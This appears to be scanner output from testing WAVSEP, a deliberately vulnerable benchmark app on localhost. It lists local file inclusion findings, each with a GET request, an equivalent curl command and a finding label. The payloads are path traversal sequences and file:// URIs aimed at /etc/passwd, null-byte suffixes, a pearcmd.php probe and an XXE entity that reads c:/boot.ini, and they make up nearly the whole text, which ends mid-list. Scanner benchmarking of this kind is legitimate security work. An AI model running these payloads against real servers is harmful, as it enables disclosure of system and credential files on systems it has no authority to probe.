GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
